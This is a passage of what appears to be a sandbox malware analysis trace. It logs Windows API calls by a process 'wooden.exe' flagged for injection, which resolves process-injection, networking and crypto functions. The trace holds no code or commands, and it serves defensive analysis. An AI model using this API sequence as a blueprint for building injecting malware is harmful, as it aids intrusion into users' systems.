lpte=0xdaf994) returned 1 [0172.862] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.862] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.863] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.863] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.863] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.863] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.864] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.864] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.864] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.864] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.865] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.865] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.865] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.866] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.866] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.866] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.866] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.867] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.867] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.867] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.867] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.868] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.868] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.868] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.869] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.869] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.869] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.870] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.870] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.870] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.870] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.871] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.871] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.871] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.871] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.872] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.872] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.872] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.873] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.873] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.873] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.873] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.874] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.874] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.874] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.874] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.875] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.875] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.875] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.876] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.876] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.876] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.876] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.877] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.877] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.877] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.878] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.878] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.878] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.878] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.879] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.879] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.879] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.879] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.880] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.880] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.880] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.881] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.881] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.881] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.882] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.882] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.882] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.882] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.883] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.883] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.883] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.884] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.884] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.884] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.884] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.885] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.885] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.885] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.885] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.886] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.886] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.886] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.887] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.887] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.887] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.887] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.888] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.888] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.889] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.889] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.889] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.889] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.890] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.890] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.890] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.890] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.891] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.891] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.891] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.892] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.892] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.892] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.892] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.893] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.893] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.893] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.894] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.894] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.894] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.894] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.895] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.895] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.895] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.895] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.896] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.896] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.896] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.897] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.897] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.897] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.897] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.898] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.898] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.898] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.898] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.899] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.899] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.899] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.900] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.900] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.900] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.900] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.901] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.901] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.901] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.901] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.902] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.902] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.902] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.903] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.903] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.903] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.904] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.904] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.904] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.905] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.905] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.905] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.905] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.906] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.906] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.906] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.906] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.907] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.907] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.907] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.907] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.908] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.908] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.908] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.909] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.909] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.909] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.909] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.910] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.910] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.910] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.911] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.911] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.911] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.911] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.912] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.912] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.912] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.913] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.913] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.913] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.913] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.914] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.914] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.914] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.915] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.915] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.915] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.915] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.916] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.916] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.916] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.917] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.917] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.917] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.917] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.918] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.918] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.918] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.918] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.919] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.919] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.919] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.920] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.920] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.920] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.920] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.921] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.921] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.921] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.922] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.922] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.922] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.922] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.923] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.923] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.941] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x488) returned 0x8c [0172.941] ResumeThread (hThread=0x8c) returned 0x1 [0172.941] CloseHandle (hObject=0x8c) returned 1 [0172.941] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a4) returned 0x8c [0172.941] ResumeThread (hThread=0x8c) returned 0x1 [0172.941] CloseHandle (hObject=0x8c) returned 1 [0172.989] CloseHandle (hObject=0x88) returned 1 [0172.989] VirtualQuery (in: lpAddress=0x5109f0, lpBuffer=0xdaf988, dwLength=0x1c | out: lpBuffer=0xdaf988*(BaseAddress=0x510000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.989] GetProcessHeap () returned 0x4f0000 [0172.989] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5109f0 | out: hHeap=0x4f0000) returned 1 [0172.989] VirtualQuery (in: lpAddress=0x5108e0, lpBuffer=0xdaf988, dwLength=0x1c | out: lpBuffer=0xdaf988*(BaseAddress=0x510000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.989] GetProcessHeap () returned 0x4f0000 [0172.989] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5108e0 | out: hHeap=0x4f0000) returned 1 [0172.989] RtlExitUserThread (Status=0x0) Process: id = "35" image_name = "wooden.exe" filename = "c:\\program files\\windows journal\\wooden.exe" page_root = "0x66163000" os_pid = "0x644" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Windows Journal\\wooden.exe\" " cur_dir = "C:\\Program Files\\Windows Journal\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 269 os_tid = 0x9a0 Thread: id = 270 os_tid = 0x30c Thread: id = 271 os_tid = 0xb48 [0172.622] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0172.622] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0172.622] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0172.622] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0172.622] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0172.623] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0172.624] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0172.625] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0172.625] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0172.625] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0172.625] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0172.626] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0172.626] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0172.626] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0172.626] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0172.626] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0172.632] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0172.632] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0172.632] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0172.636] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0172.636] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0172.636] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0172.636] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0172.636] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0172.637] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0172.637] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0172.637] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0172.637] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0172.637] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0172.637] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0172.637] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0172.642] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0172.643] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0172.643] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0172.643] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0172.643] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0172.643] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0172.643] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0172.643] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0172.643] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0172.643] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0172.643] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x221f988 | out: lpflOldProtect=0x221f988*=0x40) returned 1 [0172.643] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x221f988 | out: lpflOldProtect=0x221f988*=0x4) returned 1 [0172.644] VirtualQuery (in: lpAddress=0xf0016, lpBuffer=0x221f980, dwLength=0x1c | out: lpBuffer=0x221f980*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0172.644] GetProcessHeap () returned 0xa30000 [0172.644] RtlAllocateHeap (HeapHandle=0xa30000, Flags=0x8, Size=0x364) returned 0xa50530 [0172.644] RtlMoveMemory (in: Destination=0xa50530, Source=0xf0016, Length=0x363 | out: Destination=0xa50530) [0172.644] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xf0016) returned 0x0 [0172.645] GetCurrentProcessId () returned 0x644 [0172.645] GetProcessHeap () returned 0xa30000 [0172.645] RtlAllocateHeap (HeapHandle=0xa30000, Flags=0x8, Size=0x105) returned 0xa508a0 [0172.645] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xa508a0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Journal\\wooden.exe" (normalized: "c:\\program files\\windows journal\\wooden.exe")) returned 0x2b [0172.645] GetProcessHeap () returned 0xa30000 [0172.645] RtlAllocateHeap (HeapHandle=0xa30000, Flags=0x8, Size=0x105) returned 0xa509b0 [0172.645] GetCurrentProcessId () returned 0x644 [0172.645] wsprintfA (in: param_1=0xa509b0, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Windows Journal\\wooden.exe37084212416043") returned 57 [0172.645] CryptAcquireContextA (in: phProv=0x221f984, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x221f984*=0xa50b00) returned 1 [0172.685] CryptCreateHash (in: hProv=0xa50b00, Algid=0x8003, hKey=0x0, dwFlags=0x0, 